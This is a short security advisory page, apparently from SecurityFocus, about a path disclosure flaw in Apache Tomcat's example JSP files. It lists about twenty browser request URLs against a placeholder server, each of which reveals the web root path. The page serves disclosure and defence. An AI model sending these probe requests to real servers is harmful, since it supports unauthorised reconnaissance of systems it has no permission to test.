Apache Tomcat Example Files Web Root Path Disclosure Vulnerability

This vulnerability can be exploited with a web browser.

The attacker can submit a request in one of the following formats:
http://webserver/test/jsp/pageInfo.jsp
http://webserver/test/jsp/pageImport2.jsp
http://webserver/test/jsp/buffer1.jsp
http://webserver/test/jsp/buffer2.jsp
http://webserver/test/jsp/buffer3.jsp
http://webserver/test/jsp/buffer4.jsp
http://webserver/test/jsp/comments.jsp
http://webserver/test/jsp/extends1.jsp
http://webserver/test/jsp/extends2.jsp
http://webserver/test/jsp/pageAutoFlush.jsp
http://webserver/test/jsp/pageDouble.jsp
http://webserver/test/jsp/pageExtends.jsp
http://webserver/test/jsp/pageImport2.jsp
http://webserver/test/jsp/pageInfo.jsp
http://webserver/test/jsp/pageInvalid.jsp
http://webserver/test/jsp/pageIsErrorPage.jsp
http://webserver/test/jsp/pageIsThreadSafe.jsp
http://webserver/test/jsp/pageLanguage.jsp
http://webserver/test/jsp/pageSession.jsp
http://webserver/test/jsp/declaration/IntegerOverflow.jsp


 

Privacy Statement
Copyright 2010, SecurityFocus